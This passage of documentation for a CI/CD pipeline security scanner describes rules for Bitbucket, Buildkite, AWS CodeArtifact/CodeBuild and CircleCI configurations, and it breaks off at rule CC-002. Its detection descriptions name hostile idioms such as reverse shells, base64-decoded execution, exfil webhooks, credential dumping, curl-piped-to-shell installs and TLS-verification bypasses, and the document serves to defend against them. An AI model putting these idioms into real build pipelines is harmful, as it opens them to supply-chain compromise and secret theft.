How this is detected. Bitbucket caches are restored by key. When the key includes a value the attacker controls (branch name, tag, PR ID), a pull-request pipeline can plant a poisoned cache entry that a subsequent default-branch build restores.

Recommendation. Build the cache key from values the attacker cannot control. Prefer hashFiles() on lockfiles enforced by branch protection. Never include $BITBUCKET_BRANCH or PR-related variables in the cache key.

Source: BB-018 in the Bitbucket provider.

BB-019: after-script references secrets HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Bitbucket's after-script runs unconditionally after the main script block (including on failure). If the after-script references secrets or tokens, those values may leak into build logs or artifacts even when the step fails unexpectedly. This check detects secret-like variable references in after-script blocks.

Recommendation. Move secret-dependent operations into the main script: block. after-script runs even when the step fails and executes in a separate shell context, credential exposure here is harder to audit and more likely to persist in logs.

Source: BB-019 in the Bitbucket provider.

BB-020: Full clone depth exposes complete history LOW

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. By default Bitbucket Pipelines clone with depth: 50. Setting depth: full exposes the entire commit history, including any secrets that were committed and later removed. This check flags explicit clone: depth: full settings.

Recommendation. Set clone: depth: 1 (or a small number) in pipeline or step options to limit the amount of repository history available in the build environment. Full clones make it easier to extract secrets that were committed and later removed.

Source: BB-020 in the Bitbucket provider.

BB-021: Package install without lockfile enforcement MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.

Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-021 in the Bitbucket provider.

BB-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.

Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR pipeline (e.g. Dependabot, Renovate).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Common build-tool bootstrapping idioms (pip install --upgrade pip, pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by the DEP_UPDATE_RE tooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH to ignore.

Source: BB-022 in the Bitbucket provider.

BB-023: TLS / certificate verification bypass HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.

Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-023 in the Bitbucket provider.

BB-024: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Bitbucket has no native SLSA builder; self-hosted attestation via cosign attest or witness run is the usual path. Pipes like atlassian/cosign-attest (if published) would also match.

Recommendation. Add a step that runs cosign attest against a provenance.intoto.jsonl statement, or integrate the TestifySec witness run attestor. Artifact signing alone (BB-006) doesn't satisfy SLSA Build L3.

Source: BB-024 in the Bitbucket provider.

BB-025: Pipeline contains indicators of malicious activity CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Specific indicators only (reverse shells, base64-decoded execution, miner binaries, Discord/Telegram webhooks, credential-dump pipes, audit-erasure commands). Does not replace BB-014 (TLS bypass) or BB-013 (Docker insecure), those are hygiene; this is evidence.

Recommendation. Treat as a potential compromise. Identify the PR that added the matching step(s), rotate any credentials referenced from the pipeline's variable groups, and audit recent builds.

Known false positives.

  • Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
  • Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.

Source: BB-025 in the Bitbucket provider.

BB-026: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Complements BB-002 (script injection from untrusted PR context). This rule fires on intrinsically risky idioms, eval, sh -c "$X", backtick exec, regardless of whether the input source is currently trusted.

Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary.

Known false positives.

  • eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.

Source: BB-026 in the Bitbucket provider.

BB-027: Package install bypasses registry integrity (git / path / tarball source) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Complements BB-021 (missing lockfile flag). Git URL installs without a commit pin, local-path installs, and direct tarball URLs bypass the registry integrity controls the lockfile relies on.

Recommendation. Pin git dependencies to a commit SHA. Publish private packages to an internal registry instead of installing from a filesystem path or tarball URL.

Source: BB-027 in the Bitbucket provider.

BB-028: OIDC step without deployment-gated environment HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Pairs with IAM-008. IAM-008 verifies the cloud-side trust policy pins audience + subject; this rule verifies the Bitbucket-side workflow can't request a token without a deployment gate. Bitbucket's pull-requests: triggers from forks so OIDC under that branch is always an unbounded blast radius.

Recommendation. Every step that sets oidc: true must also declare a deployment: (production / staging / test). Bitbucket deployments enforce manual approvals, restricted variables, and audit logs that an ungated step bypasses. Steps reached through pull-requests: should never request OIDC tokens, any forked PR can drive the role assumption.

Source: BB-028 in the Bitbucket provider.

BB-029: image: (step or service) not pinned by sha256 digest HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. BB-001 / BB-009 only inspect pipe: references inside script: lists. Step image: directives and definitions.services.<name>.image: define the runtime container the build executes inside (and the auxiliary containers the step talks to over the loopback network). Both surfaces ship code into the build context, a compromised service image (the postgres container, the selenium-grid container, …) can exfiltrate every secret the step touches just as easily as the step image itself. This rule reuses _primitives.image_pinning.classify so the floating-tag semantics match GHA-001 / GL-001 / JF-009 / ADO-009 / CC-003 / K8S-001.

Recommendation. Resolve every image: reference to its current digest (docker buildx imagetools inspect <ref> or crane digest <ref>) and pin via image: name@sha256:<digest>. Floating tags (:latest, :3, no tag) silently swap the runtime image, the build's reproducibility invariant is broken and a registry-side compromise lands inside CI without any local change.

Known false positives.

  • Bitbucket-vendored helper images (atlassian/ namespace) are still treated as third-party, the registry can move the tag. Pin them too rather than suppressing the rule globally.

Source: BB-029 in the Bitbucket provider.

BK-001: Buildkite plugin not pinned to an exact version HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Buildkite resolves plugin refs at agent boot. foo#v1.2.3 locks the version; foo#main / foo does not. Detection fires on bare names, branch keywords, and partial-semver pins (v4, v4.13).

Recommendation. Pin every plugin reference to an exact tag (docker-compose#v4.13.0) or a 40-char commit SHA. Bare references (docker-compose), branch refs (#main / #master), and major-only floats (#v4) resolve to whatever is current at agent start time, which lets a compromised plugin release execute inside the pipeline.

Source: BK-001 in the Buildkite provider.

BK-002: Literal secret value in pipeline env block CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene, CICD-SEC-7 Insecure System Configuration.

How this is detected. Detection fires on values that look like AWS access keys, GitHub PATs, OpenAI keys, JWTs, or generic high-entropy tokens, plus on env-var names that imply a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) when the value is a non-empty literal rather than an interpolation ($SECRET_FROM_AGENT_HOOK).

Recommendation. Move the value out of the pipeline file. Use Buildkite's agent secrets hooks (secrets/ directory or BUILDKITE_PLUGIN_AWS_SSM_*), the aws-ssm / vault-secrets plugins, or the BUILDKITE_PIPELINE_DEFAULT_BRANCH env var pulled from a secret manager. The pipeline.yml is committed to the repo and visible to anyone with read access.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BK-002 in the Buildkite provider.

BK-003: Untrusted Buildkite variable interpolated in command HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Buildkite passes branch / tag / message metadata as environment variables. Putting them inside $(...) or shelling out with the value unquoted is a classic command-injection vector. The detection fires on the unquoted interpolation form and on use inside eval / $(...).

Recommendation. Don't interpolate $BUILDKITE_BRANCH, $BUILDKITE_TAG, $BUILDKITE_MESSAGE, $BUILDKITE_PULL_REQUEST_*, or $BUILDKITE_BUILD_AUTHOR* directly into shell commands. These come from the pull request / branch and are attacker-controllable. Quote them and assign to a local variable first (branch="$BUILDKITE_BRANCH"; ./script --branch "$branch"), or pass them as arguments to a script you own.

Source: BK-003 in the Buildkite provider.

BK-004: Remote script piped into shell interpreter HIGH 🔧 fix

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-3 Dependency Chain Abuse.

How this is detected. The detection fires on curl|bash, curl|sh, wget|bash, iex (iwr ...), and the corresponding Invoke-WebRequest|Invoke-Expression PowerShell forms. Use curl -fsSLO <url>; sha256sum -c install.sh.sha256; bash install.sh instead.

Recommendation. Download the installer to disk, verify a checksum or signature, then execute it. curl ... | sh lets the remote host change what runs in your pipeline at any time, and any TLS / DNS error during download silently feeds a partial script to the shell.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BK-004 in the Buildkite provider.

BK-005: Container started with --privileged or host-bind escalation HIGH 🔧 fix

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Detection fires on --privileged, --cap-add=SYS_ADMIN, --pid=host / --ipc=host / --userns=host, and explicit mounts of the host Docker socket (/var/run/docker.sock).

Recommendation. Drop --privileged, --cap-add=SYS_ADMIN, --pid=host, and -v /var/run/docker.sock from container invocations. If the workload needs Docker-in-Docker, use a build-specific rootless option (buildx, kaniko, buildah --isolation=chroot) instead of opening the host kernel and the agent's Docker socket to the build script.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BK-005 in the Buildkite provider.

BK-006: Step has no timeout_in_minutes LOW

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Buildkite has no implicit timeout; agents will wait forever. Set timeout_in_minutes: per step. The pipeline-level default counts, a global steps: block with timeout_in_minutes: is fine, since Buildkite copies it to each step.

Recommendation. Set timeout_in_minutes: on every command step. A compromised dependency or a hung test can otherwise hold an agent indefinitely, blocking parallel pipelines and running up self-hosted-runner cost. Pick a value generous enough for the slowest legitimate run (e.g. 30 for a typical build, 90 for an integration suite).

Known false positives.

  • Steps that genuinely need >24h (rare; database migrations, ML training jobs), set timeout_in_minutes: 1440 explicitly so the absence of a timeout is intentional.

Source: BK-006 in the Buildkite provider.

BK-007: Deploy step not gated by a manual block / input MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-7 Insecure System Configuration.

How this is detected. A step is treated as a deploy when its label, key, or any command line contains a deploy keyword (deploy, ship, release, promote, apply, rollout, terraform apply, kubectl apply, helm upgrade, aws ecs update-service). The check passes when at least one preceding step in the same pipeline file is a block: or input: flow-control step.

Recommendation. Insert a - block: "Deploy?" (or - input: step) in front of every deploy step. Buildkite waits for a human to click Unblock before the gated steps run, which prevents an unreviewed merge from auto-deploying to production. Combine with branches: main so the gate only appears on release branches.

Known false positives.

  • Pipelines where the deploy gate lives in a triggered pipeline rather than the local file, the local pipeline looks ungated even though the actual deploy is gated downstream. Add a no-op block: to silence.

Source: BK-007 in the Buildkite provider.

BK-008: TLS verification disabled in step command MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detection fires on the canonical bypass flags across curl, wget, git, npm, pip, gcloud, and openssl. The check is deliberately conservative, partial-word matches (--insecure-protocols) are excluded.

Recommendation. Drop curl -k / --insecure, wget --no-check-certificate, git -c http.sslVerify=false, and pip install --trusted-host. If a CA isn't trusted, install it into the agent's trust store (update-ca-certificates) rather than disabling validation pipeline-wide. A compromised intermediate that strips TLS gets a free hand with every fetch the step performs.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BK-008 in the Buildkite provider.

BK-009: Artifacts not signed (no cosign/sigstore step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Unsigned artifacts can't be verified downstream, a tampered build is indistinguishable from a legitimate one. The check recognises cosign, sigstore, slsa-github-generator, slsa-framework, and notation-sign as signing tools, matching the shared signing-token catalog used by the other CI packs.

Recommendation. Add a signing step, install cosign once (brew install cosign in the agent image, or a cosign-install plugin) and call cosign sign --yes <ref> after the build. For container images pushed to ECR / GCR / GHCR, the same call signs by digest. Publish the signature alongside the artifact and verify it at consumption time.

Source: BK-009 in the Buildkite provider.

BK-010: No SBOM generated for build artifacts MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog, syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool.

Recommendation. Add an SBOM-generation step. syft <artifact> -o cyclonedx-json > sbom.json runs in any standard agent image; cyclonedx-cli and cdxgen are alternative producers. Upload the SBOM via buildkite-agent artifact upload so downstream consumers (and incident-response tooling) can match deployed artifacts to the components they were built from.

Source: BK-010 in the Buildkite provider.

BK-011: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Without it, a leaked signing key forges identity but a leaked build environment also forges provenance. You need both for the SLSA L3 non-falsifiability guarantee. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, attest-build-provenance).

Recommendation. Run cosign attest --predicate slsa.json (or the SLSA-framework generator from a build-time step) after the build completes. The predicate records the build inputs and the agent that produced the artifact. Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.

Source: BK-011 in the Buildkite provider.

BK-012: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is?. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, anchore, dependency-check, checkov, semgrep.

Recommendation. Add a vulnerability scanner, trivy fs . for source / filesystem, trivy image <ref> for container images, grype and snyk for either. Add npm audit / pip-audit for language-specific dep audits. Fail the step on findings above a chosen severity so a regression blocks the merge instead of shipping.

Source: BK-012 in the Buildkite provider.

BK-013: Deploy step has no branches: filter MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. A step is treated as a deploy when its label, key, or any command line contains a deploy keyword (deploy, ship-it, release, promote, rollout, helm upgrade, kubectl apply, terraform apply, aws ecs update-service, aws lambda update-function-code, gcloud run deploy). The check passes when the step declares branches: with at least one literal branch name (a wildcard like "*" is treated as an explicit opt-out, not a passing filter, and still trips). The pipeline-level default also counts, top-level steps: with branches: propagates.

Recommendation. Add branches: "main release/*" (or your release branch glob) to every deploy step. Buildkite skips the step on any other branch, which prevents a feature-branch PR from accidentally promoting code to production. Combine with BK-007's manual block: so a release branch plus a human approval is the path to deploy.

Known false positives.

  • Trunk-based teams that branch-protect main and treat every merge as a deploy candidate may not use branches:. Add branches: main to make the policy explicit, or ignore BK-013 in .pipeline-check-ignore.yml with a scope of main-only repos.

Source: BK-013 in the Buildkite provider.

BK-014: Step commands run unpinned package installs MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detection reuses the cross-provider primitives PKG_INSECURE_RE and PKG_NO_LOCKFILE_RE from checks/base.py. Same rule pack already exists for GHA (GHA-021 / GHA-022), GitLab (GL-021 / GL-022), Bitbucket / Azure DevOps / Jenkins / CircleCI / Cloud Build / Drone. Buildkite was a gap; this closes it.

Insecure variants (PKG_INSECURE_RE): pip --index-url http://, pip --trusted-host, npm --registry http://, gem --source http://, nuget --Source http://, cargo --index http://. Lockfile-bypass variants (PKG_NO_LOCKFILE_RE): npm install (should be npm ci), bare pip install <pkg> without -r or --require-hashes, yarn install without --frozen-lockfile, bundle install without --frozen, cargo install, go install without an @vN.N pin, poetry install without --no-update.

Recommendation. Pin every package install to a lockfile or a checksum-verified version. npm ci (not npm install), yarn install --frozen-lockfile, pip install -r requirements.txt --require-hashes, bundle install --frozen. Don't use --trusted-host / --no-verify / a non-HTTPS index URL — those bypass TLS or trust validation entirely (BK-008 covers the TLS subset; this rule covers the lockfile subset).

Known false positives.

  • Bootstrap-stage installs that intentionally pull latest (apt-get install -y curl for a tooling image rebuild) sometimes legitimately bypass the lockfile. Suppress via ignore-file scoped to the specific step label when this is the deliberate shape; the broader pinning policy still covers the rest of the pipeline.

Source: BK-014 in the Buildkite provider.

BK-015: agents map interpolates attacker-controllable Buildkite variable HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-7 Insecure System Configuration.

How this is detected. Buildkite uses an agents: map to route a step to a specific runner pool. Both the top-level agents: and the per-step override are scanned. Detection mirrors BK-003's tainted-variable list ($BUILDKITE_BRANCH, $BUILDKITE_TAG, $BUILDKITE_MESSAGE, $BUILDKITE_PULL_REQUEST_*, $BUILDKITE_BUILD_AUTHOR*, $BUILDKITE_COMMIT). The pattern matches what GHA-036, GL-032, JF-032, ADO-030, and CC-031 already enforce on the other CI providers; closes parity for Buildkite.

Quote-state aware in the same way BK-003 is. "$BUILDKITE_BRANCH" doesn't fire (Buildkite doesn't shell-eval the agents map anyway, but the value still substitutes), only the unquoted single-token interpolation does.

Recommendation. Pin every agents: map entry to a static literal that matches your runner targeting policy. queue: linux-amd64 or os: linux is fine; queue: $BUILDKITE_BRANCH is not, because the pusher can route their build to whichever agent pool they want, including a privileged pool reserved for the deploy step. Production runner pools should also carry a tag the agent itself enforces (e.g. buildkite-agent start --tags 'queue=production' plus a queue-allow-list on the API token), so the rule is one layer of a defense-in-depth posture.

Known false positives.

  • Some teams use a static prefix plus a CI-controlled tail (queue: build-$BUILDKITE_PIPELINE_SLUG) to share an agent pool across pipelines. BUILDKITE_PIPELINE_SLUG is not pusher-controllable so it isn't on the tainted list, but if your team has its own conventions for trusted Buildkite vars, suppress on the specific step.

Source: BK-015 in the Buildkite provider.

CA-000: CodeArtifact API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: CA-000 in the AWS provider.

CA-001: CodeArtifact domain not encrypted with customer KMS CMK MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. AWS-owned encryption (the default alias/aws/codeartifact key) keeps the key policy under AWS's control, not yours. That's fine for confidentiality but means cross-account auditability of every Decrypt event lives with AWS, and you can't revoke or scope key access without recreating the domain. A customer-managed CMK puts both controls back in your hands.

Recommendation. Recreate the CodeArtifact domain with an encryption-key argument pointing at a customer-managed CMK. Domain encryption is set at creation and cannot be changed after.

Source: CA-001 in the AWS provider.

CA-002: CodeArtifact repository has a public external connection HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. An external connection to public:npmjs / public:pypi / public:nuget / public:maven-central fetches packages from the public registry on first resolution. A typo-squat (request vs requests) or a compromised upstream lands in the cache the first time anyone names it; every subsequent build pulls the cached substitute. The pull-through cache with an allow-list is the same risk shape solved by an explicit allowlist.

Recommendation. Route public package consumption through a pull-through cache repository governed by an allow-list of package names, and point build-time repos at that cache rather than directly at public:npmjs/public:pypi. Unscoped public upstreams expose builds to dependency-confusion and typosquatting attacks.

Source: CA-002 in the AWS provider.

CA-003: CodeArtifact domain policy allows cross-account wildcard CRITICAL

Evidences: CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. A wildcard-principal Allow on a CodeArtifact domain lets any AWS account reach the domain's permissions surface. The exact damage depends on the action set, but at minimum it lets external accounts read package names and versions, which is enough for typosquat-against-private-package attacks. aws:PrincipalOrgID is the org-level rescue without enumerating accounts.

Recommendation. Remove Allow statements with Principal: '*' from every CodeArtifact domain permissions policy, or restrict them with an aws:PrincipalOrgID condition so only accounts in your org can consume packages from the domain.

Source: CA-003 in the AWS provider.

CA-004: CodeArtifact repo policy grants codeartifact: with Resource '' HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. codeartifact:* on Resource: '*' collapses the entire repository's authority into one grant: the holder can read, write, delete, dispose, and re-publish every package. Even for a service principal that nominally only consumes packages, the grant lets a compromise of that consumer rewrite every dependency the team relies on.

Recommendation. Scope Allow statements to specific codeartifact: actions (e.g. codeartifact:ReadFromRepository) and to specific package-group ARNs. Wildcard action + wildcard resource is the classic over-broad grant that lets a consumer also publish.

Source: CA-004 in the AWS provider.

CB-000: CodeBuild API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: CB-000 in the AWS provider.

CB-001: Secrets in plaintext environment variables CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Flags a plaintext env var when either (a) its name matches a secret-like pattern (PASSWORD, TOKEN, API_KEY, ...) or (b) its value matches a known credential shape (AKIA/ASIA access keys, GitHub tokens, Slack xox* tokens, JWTs). Plaintext values are visible in the AWS console, CloudTrail, and build logs to anyone with read access.

Recommendation. Move secrets to AWS Secrets Manager or SSM Parameter Store and reference them using type SECRETS_MANAGER or PARAMETER_STORE in the CodeBuild environment variable configuration.

Source: CB-001 in the AWS provider.

CB-002: Privileged mode enabled HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Privileged mode grants the build container root access to the host's Docker daemon. A compromised build can escape the container or tamper with the host. Only flip this on for real Docker-in-Docker workloads and keep the buildspec under branch-protected review.

Recommendation. Disable privileged mode unless the project explicitly requires Docker-in-Docker builds. If required, ensure the buildspec is tightly controlled, peer-reviewed, and sourced from a trusted repository with branch protection.

Source: CB-002 in the AWS provider.

CB-003: Build logging not enabled MEDIUM

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. A CodeBuild project with neither CloudWatch Logs nor S3 logging enabled leaves no durable record of what the build did. The CodeBuild console shows the last execution's logs for a short retention window, but anything older, and any automated review of historical activity during incident response, is gone.

Recommendation. Enable CloudWatch Logs or S3 logging in the CodeBuild project configuration to maintain a durable audit trail of all build activity.

Source: CB-003 in the AWS provider.

CB-004: No build timeout configured LOW

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. A CodeBuild project at AWS's 480-minute maximum is rarely deliberate. Without a tighter ceiling, a runaway test loop, a fork-PR cryptomining payload, or a build that hangs on stdin keeps the build host (and its IAM role) live for the full eight hours, racking up cost and extending the compromise window.

Recommendation. Set a build timeout appropriate for your expected build duration (typically 15–60 minutes) to limit the blast radius of a runaway or abused build.

Source: CB-004 in the AWS provider.

CB-005: Outdated managed build image MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Only AWS-managed aws/codebuild/standard:N.0 images are version-checked. Custom or third-party images pass here, CB-009 handles the separate concern of tag vs digest pinning for custom images.

Recommendation. Update the CodeBuild environment image to aws/codebuild/standard:7.0 or later to ensure the build environment receives the latest security patches.

Known false positives.

  • One version behind the current aws/codebuild/standard is a hygiene warning, not a production issue, and defaults to MEDIUM confidence. The rule emits HIGH only when the project is two or more versions behind. Custom or third-party images are not version-checked here; CB-009 handles tag-vs-digest pinning for those.

Source: CB-005 in the AWS provider.

CB-006: CodeBuild source auth uses long-lived token HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. OAUTH / PERSONAL_ACCESS_TOKEN / BASIC_AUTH source credentials are stored long-lived on the account and used by every CodeBuild project that points at the SCM provider. Rotating the upstream PAT requires manual re-credentialing here too. CodeConnections (CodeStar) is the AWS-managed alternative with token refresh and revocation.

Recommendation. Switch to an AWS CodeConnections (CodeStar) connection and reference it from the source configuration. Delete any stored source credentials of type OAUTH, PERSONAL_ACCESS_TOKEN, or BASIC_AUTH via delete_source_credentials.

Source: CB-006 in the AWS provider.

CB-007: CodeBuild webhook has no filter group MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. A CodeBuild webhook with no filter groups fires on every push and every PR from any actor, including fork PRs from outside the org. Anyone able to open a PR triggers the build with whatever IAM authority the project's role carries. Filter groups (branch + actor + event type) are the gate.

Recommendation. Define filter groups restricting triggers to specific branches, actors, and event types.

Source: CB-007 in the AWS provider.

CB-008: CodeBuild buildspec is inline (not sourced from a protected repo) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. An inline buildspec (source.buildspec set to YAML text, or a S3 URL) bypasses the protections that cover your source code. A user with codebuild:UpdateProject can rewrite the build commands without touching the repository, no PR review, no branch protection, no audit of what changed. Store buildspec.yml in the repo instead.

Recommendation. Remove the inline buildspec and store buildspec.yml in the source repository under branch protection. Anyone with codebuild:UpdateProject can silently rewrite an inline buildspec; repository-sourced buildspecs inherit the repo's review and protection controls.

Source: CB-008 in the AWS provider.

CB-009: CodeBuild image not pinned by digest MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. CodeBuild pulls the environment image on every build. A tag pointer can be moved by whoever controls the registry; a digest cannot. AWS-managed aws/codebuild/... images are exempt. Those are covered by CB-005 and are not part of the tag-mutation threat model.

Recommendation. Pin custom CodeBuild images by @sha256:<digest>. Tag-based references (:latest, :1.2.3) can be silently overwritten to point at a malicious layer that is pulled on the next build.

Source: CB-009 in the AWS provider.

CB-010: CodeBuild webhook allows fork-PR builds without actor filtering HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GitHub/Bitbucket webhook filter groups that fire on pull-request events will build forks by default. Because CodeBuild runs with the project's own IAM role (not the PR author's), a fork PR can execute arbitrary code with CI privileges and exfiltrate secrets. Restrict to known contributors with an ACTOR_ACCOUNT_ID pattern group.

Recommendation. Add an ACTOR_ACCOUNT_ID filter pattern to every webhook filter group that accepts PULL_REQUEST_CREATED / PULL_REQUEST_UPDATED / PULL_REQUEST_REOPENED, or remove those PR event types. Without actor filtering, any fork can trigger a build that runs with the project's service role.

Source: CB-010 in the AWS provider.

CB-011: CodeBuild buildspec contains indicators of malicious activity CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Scans the source.buildspec text on every CodeBuild project for concrete attack indicators: reverse shells, base64-decoded execution, miner binaries/pools, Discord/Telegram webhooks, credential-dump pipes, audit-erasure commands. CB-011 is CRITICAL by design, a true positive is evidence of compromise, not a hygiene improvement. Repo-sourced buildspecs (not inlined) return NOT APPLICABLE because the text isn't visible to the scanner; CB-008 already flags the inline form as a governance gap.

Recommendation. Treat as a potential compromise. Identify which principal or pipeline ran the CodeBuild project recently, rotate its service role's credentials, audit CloudTrail for outbound activity to the matched hosts, and, if an inline buildspec is in use (CB-008), enforce repo-sourced buildspecs under branch protection so the next malicious edit requires a PR.

Known false positives.

  • Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
  • Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.

Source: CB-011 in the AWS provider.

CC-001: Orb not pinned to exact semver HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Orb references in the orbs: block must include an @x.y.z suffix to lock a specific version. References without @, with @volatile, or with only a major (@1) or major.minor (@5.1) version float and can silently pull in malicious updates.

Recommendation. Pin every orb to an exact semver version (circleci/node@5.1.0). Floating references like @volatile, @1, or bare names without @ resolve to whatever is latest at build time, allowing a compromised orb update to execute in the pipeline.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: CC-001 in the CircleCI provider.

CC-002: Script injection via untrusted environment variable HIGH

